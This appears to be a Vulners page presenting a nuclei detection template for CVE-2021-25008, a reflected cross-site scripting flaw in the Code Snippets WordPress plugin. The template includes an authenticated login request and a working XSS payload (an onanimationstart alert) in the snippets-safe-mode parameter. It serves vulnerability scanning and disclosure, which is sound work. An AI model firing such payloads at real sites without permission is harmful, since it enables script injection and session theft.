Lucene search
K

The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scriptin

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress 插件跨站脚本漏洞
24 Jan 202200:00
cnnvd
CNVD
WordPress Code Snippets plugin cross-site scripting vulnerability
26 Jan 202200:00
cnvd
CVE
CVE-2021-25008
24 Jan 202208:01
cve
Cvelist
CVE-2021-25008 Code Snippets < 2.14.3 - Reflected Cross-Site Scripting
24 Jan 202208:01
cvelist
EUVD
EUVD-2021-11920
7 Oct 202500:30
euvd
NVD
CVE-2021-25008
24 Jan 202208:15
nvd
OpenVAS
WordPress Code Snippets Plugin < 2.14.3 XSS Vulnerability
26 Jan 202200:00
openvas
Patchstack
WordPress Code Snippets plugin <= 2.14.2 - Reflected Cross-Site Scripting (XSS) vulnerability
27 Dec 202100:00
patchstack
Prion
Cross site scripting
24 Jan 202208:15
prion
RedhatCVE
CVE-2021-25008
22 May 202521:36
redhatcve
Rows per page
id: CVE-2021-25008

info:
  name: The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting
  author: cckuailong
  severity: medium
  description: The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update the Code Snippets WordPress Plugin to version 2.14.3 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25008
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25008
    cwe-id: CWE-79
    epss-score: 0.02268
    epss-percentile: 0.80924
    cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: codesnippets
    product: code_snippets
    framework: wordpress
  tags: cve,cve2021,authenticated,wpscan,xss,wp,wordpress,wp-plugin,codesnippets,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
          - "Snippets"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200a335b92a955323bb129f158af8e401c65eda389a3a8479fd7057861ecd2e693022070315108123c49acbb2404a72010a1c765f129ce328dc0666b4f392114af4adc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.02268
34